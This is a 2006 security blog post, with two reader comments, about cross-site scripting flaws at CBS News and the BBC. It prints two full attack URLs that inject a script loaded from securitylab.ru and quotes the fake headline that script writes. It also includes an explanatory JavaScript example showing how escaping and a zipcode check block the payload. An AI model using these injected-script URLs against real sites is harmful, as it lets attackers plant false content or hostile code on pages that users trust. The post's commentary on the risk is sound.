Sunday, August 27, 2006

Why 0wn When You Can XSS

The creative Russians at Security Lab posted word of two more high-profile sites with Cross Site Scripting (XSS) vulnerabilities. They used this announcement to demonstrate problems at CBS News and the BBC.

The URL they provide for CBS is:

http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1 \
--%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

(Remove the space and \ to make the URL one big line.)

Looks like there's a problem with the zipcode part of the site through which one can check local weather.

The URL for the BBC is similar:

http://www.bbc.co.uk/bbcone/listings/index.shtml?service_id=4223&DAY=today %22%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

(Remove the space to make the URL one big line.)

The file sc.js that they retrieve has the following:

document.write('<p align=left>Mon, 28 August 2006');
document.write('<p align=center><b>George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment</b>');
...truncated...

The net effect is demonstrated by these screen captures for CBS News and the BBC.

Yes, the use of sc.js means you could replace the URL http://www.securitylab.ru/test/sc.js with one of your own, causing your custom news to be placed at either site -- until they disable the functionality or remove the vulnerability.
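To make the mechanism concrete, here is an added example (not code from the original post, CBS, the BBC or Security Lab) that models a server-side template dropping the zipcode parameter into an HTML comment, which is what the published CBS URL suggests, and shows why HTML-escaping the value before insertion neutralises it. The template, the escaping helper and the zipcode allowlist check are all constructed for illustration.

```javascript
// Added example, not the original page's code. The template below is
// constructed to mimic a page that echoes a query parameter inside an HTML
// comment; it is not the real CBS markup.

// The payload as it appears in the post's CBS URL (space and backslash
// removed), URL-decoded so it reads the way the server would see it.
const payload = decodeURIComponent(
  '1--%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--'
);

// Escape the characters that change meaning in HTML text and attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the raw parameter lands inside an HTML comment, so a
// value containing "-->" closes the comment and everything after it is markup.
function renderUnsafe(zipcode) {
  return `<!-- requested zipcode: ${zipcode} --><div id="weather"></div>`;
}

// Hardened rendering: same template, but the value is escaped first, so "<"
// and ">" can neither form a tag nor terminate the comment.
function renderSafe(zipcode) {
  return `<!-- requested zipcode: ${escapeHtml(zipcode)} --><div id="weather"></div>`;
}

// Count <script ...> start tags a browser would parse out of a fragment.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Input validation / log-review check: a US zipcode is five digits with an
// optional four-digit extension; anything else in that parameter is suspect.
function looksLikeZipcode(value) {
  return /^\d{5}(-\d{4})?$/.test(value.trim());
}

console.log(countScriptTags(renderUnsafe(payload))); // 1: the remote script is live
console.log(countScriptTags(renderSafe(payload)));   // 0: rendered as inert text
console.log(looksLikeZipcode(payload));              // false
```

Escaping on output is the fix for the reflection itself; the allowlist check is the cheap companion control and the pattern to search for in web server logs when looking for the same probing against your own parameters.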

Eight to ten years ago Web defacements were all the rage. They seemed to get less attention as the major players removed traditional means of exploitation. As Web sites have become more complex, intruders are finding new ways to abuse them. While this is less of a defacement and more of a dynamic presentation of attacker information, it's still a big problem. Think of the havoc false information could temporarily cause.

People already shouldn't trust what they read in emails. Soon they may lose trust in what they read on Web sites.

2 comments:

xianman said...

You're not actually modifying the web site, only changing what's displayed to whoever clicks the link. Big deal.

Richard Bejtlich said...

xianman, that's why the title of this post is what it says.

However, from the perspective of the average user, there is little difference. That is a big deal.